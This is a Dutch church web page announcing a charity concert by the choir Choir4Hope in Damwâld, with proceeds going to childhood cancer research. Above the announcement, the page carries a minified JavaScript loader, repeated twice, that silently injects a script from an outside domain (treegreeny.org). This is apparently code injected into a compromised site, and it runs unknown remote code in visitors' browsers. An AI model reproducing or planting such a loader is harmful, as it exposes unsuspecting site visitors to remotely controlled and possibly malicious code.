;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag: Samen met het koor Choir4Hope tegen Kanker - PKN Damwâld

Zingend naar de Zondag: Samen met het koor Choir4Hope tegen Kanker

Gepubliceerd op: woensdag 24 augustus 2022

Na een oponthoud van 2½ jaar gaan we wederom van start met Zingend naar de Zondag en komt op zaterdagavond 22 oktober het ruim 100 leden tellende koor Choir4Hope uit Barneveld en omgeving naar de Gereformeerde Kerk De Ontmoeting aan de Foarwei in Damwâld om mee te werken aan deze avond.

Het koor is opgericht op 6 oktober 2014 op initiatief van dirigent Peter Overduin, om met de opbrengsten van optredens te strijden tegen met name kanker. De combinatie van zingen voor een goed doel en een breed repertoire blijkt een goede formule en is zeer succesvol!! Het koor kreeg grote bekendheid door deelname aan Hollands Got Talent en hun optredens in Nederland Zingt van de E.O. Choir4Hope treedt uitsluitend op voor goede doelen en heeft daarom ook de ANBI-status waardoor giften aan het koor fiscaal aftrekbaar zijn.

Peter Overduin begon op 8-jarige leeftijd met orgel les en sindsdien is het maken van muziek nooit meer gestopt. Hij volgde dirigentcursussen via de Kurt Thomas Stichting en al vrij snel daarna volgde zijn eerste koor. Mede om persoonlijke redenen wilde hij jaren geleden gaan zingen voor goede doelen en richtte hij Choir4Hope in Barneveld en Inspire2liveChoir in Alblasserdam op. Beide koren zingen hoofdzakelijk Geestelijke liederen maar ook Negro-Spirituals en Klassieke werken.

Als organisatie hebben wij, behalve Evangeliseren, als doel om dienstbaar te zijn aan onze medemens en daarom past het prima om juist dit koor uit te nodigen. En wat is er mooier om na afloop de opbrengst van de collecte en de sponsoring te schenken aan dit geweldige doel: Het bestrijden van Kanker bij Kinderen. Een ziekte, die we ongetwijfeld allemaal kennen in gezin, familie of kennissenkring en waar nog steeds veel onderzoek voor nodig is om die in de toekomst mogelijk geheel te kunnen uitbannen. Strijdt u mee? Wij willen geen drempels, maar evangelisatie die toegankelijk is voor IEDEREEN. Ook deze keer geen entree kosten. U gaat genieten van een geweldig optreden en u kunt aan het goede doel schenken. Voor beide mag u bijdragen in de collectezak. Laat hierbij uw hart spreken, dan kan het koor met een prachtig resultaat huiswaarts gaan. Voor het eerst gaan wij sponsoren benaderen en opnemen in ons programmaboekje, allemaal voor het goede doel!

Het koor zingt bekende liederen zoals Amazing Grace, Where no one stands alone en Hoog boven alle vragen op de melodie van You raise me up. Ook enkele solisten verlenen hun medewerking nl. Sierk Krol (bariton) en Annelies Schep (sopraan).
Achter het orgel neemt Jacob Schenk uit Urk plaats. Deze gepassioneerde musicus is werkzaam als koordirigent, organist, pianist, panfluitist en zanger. Op dit moment is hij koordirigent van 5 koren en werkt hij vaak mee aan talloze uitvoeringen en cd-opnamen in binnen- en buitenland. Hij begeleidt ook de samenzang die er deze avond weer volop is o.a. van bekende liederen uit Johannes de Heer en de Evangelische Liedbundel. Het belooft weer een prachtige avond te worden waarin de naam van God en het omzien naar onze naaste centraal zullen staan. De presentatie is in handen van dhr. Jan van der Meer uit Drachten, die opnieuw spontaan zijn medewerking verleent.

De totale opbrengst, bestemd voor het Prinses Maxima Centrum voor onderzoek naar Kinderoncologie, zullen wij aan het eind van de avond via een cheque overhandigen.
U bent allen van harte uitgenodigd. De zangavond begint om 19.30 uur.

PS. Wij hebben geen technische middelen voor uw bijdragen, dus neemt u contant geld mee??